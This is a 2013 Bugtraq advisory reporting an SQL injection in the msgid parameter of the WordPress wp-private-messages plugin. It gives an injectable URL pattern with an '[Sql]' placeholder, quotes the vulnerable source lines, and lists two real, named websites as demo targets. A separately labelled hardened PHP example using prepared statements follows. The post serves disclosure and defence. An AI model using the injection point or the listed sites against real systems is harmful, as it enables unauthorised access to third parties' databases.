Message-Id: <201306291502.r5TF2b2t006435@sf01web1.securityfocus.com>
Date: Sat, 29 Jun 2013 15:02:37 GMT
From: iedb.team@...il.com
To: bugtraq@...urityfocus.com
Subject: Wordpress wp-private-messages Plugin Sql Injection vulnerability
The WordPress wp-private-messages plugin suffers from an SQL injection vulnerability.
#################################
# Iranian Exploit DataBase
# Www.exploit.IrIsT.Ir
#################################
# Exploit Title : Wordpress wp-private-messages Plugin Sql Injection vulnerability
# Author : Iranian Exploit DataBase
# Discovered By : IeDb
# Home : http://exploit.IrIsT.Ir
# Software Link : http://wordpress.org/plugins/wp-private-messages/
# Security Risk : High
# Tested on : Linux
#################################
# Exploit :
# http://www.Site.com/wp-admin/profile.php?page=wp-private-messages/wpu_private_messages.php&wpu=reply&msgid=[Sql]
# Dem0 :
# http://renewedculture.com/wp-admin/profile.php?page=wp-private-messages/wpu_private_messages.php&wpu=reply&msgid=[Sql]
# http://www.rockfordravens.org/wp-admin/profile.php?page=wp-private-messages/wpu_private_messages.php&wpu=reply&msgid=[Sql]
#################################
# Vuln Source C0de :
# Line 145 :
# $messages = $wpdb->get_results("SELECT id, sender, subject, date, status FROM $wpdb->prefix".private_messages." WHERE rcpid = '".$current_user->ID."' AND tosee = 1 ORDER BY date DESC");
# And Line 160 :
# echo "<a href=\"?page=".dirname(plugin_basename(__FILE__))."/wpu_private_messages.php&wpu=reply&msgid=".$message->id."\"><img src=\"". get_settings('siteurl') . "/wp-content/plugins/".dirname(plugin_basename(__FILE__))."/icons/reply.png\" alt=\"Reply!\" title=\"".__('Reply!', $wpulang)."\"></a>";
#################################
# Exploit Archive : http://exploit.irist.ir/exploits-148.html
#################################
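
Added example, not part of the original post and not the plugin's code: a hardened lookup for the msgid parameter of the wpu=reply view. The lines quoted in the advisory show the inbox query and the reply link, not the query that consumes msgid, so the lookup itself is an assumption; the function name wpu_example_get_reply_message is hypothetical, while the table and column names are taken from the quoted line 145.

```php
<?php
// Added example. Assumes it is loaded inside WordPress, so $wpdb, absint(),
// wp_get_current_user() and wp_die() are available.
defined('ABSPATH') || exit;

/**
 * Hypothetical helper: return the message being replied to, or null.
 */
function wpu_example_get_reply_message($raw_msgid)
{
    global $wpdb;

    // Accept only a plain decimal id. Anything else is rejected outright
    // instead of being "cleaned up" and passed on to the database.
    if (!is_scalar($raw_msgid) || !ctype_digit((string) $raw_msgid)) {
        return null;
    }
    $msgid = absint($raw_msgid);
    $user  = wp_get_current_user();
    if ($msgid === 0 || !$user->exists()) {
        return null;
    }

    // The table name is built from trusted values only; request data reaches
    // the query exclusively through the %d placeholders of prepare().
    $table = $wpdb->prefix . 'private_messages';
    $sql   = $wpdb->prepare(
        "SELECT id, sender, subject, date, status
           FROM {$table}
          WHERE id = %d AND rcpid = %d AND tosee = 1",
        $msgid,
        $user->ID
    );

    // The rcpid condition also stops a user from opening someone else's
    // message by guessing ids. get_row() returns null when nothing matches.
    return $wpdb->get_row($sql);
}

// Usage in the reply view (wpu=reply), the request shape shown in the advisory.
if (isset($_GET['wpu']) && $_GET['wpu'] === 'reply') {
    $raw     = isset($_GET['msgid']) ? wp_unslash($_GET['msgid']) : '';
    $message = wpu_example_get_reply_message($raw);
    if ($message === null) {
        wp_die(esc_html__('Message not found.'), '', array('response' => 404));
    }
}
```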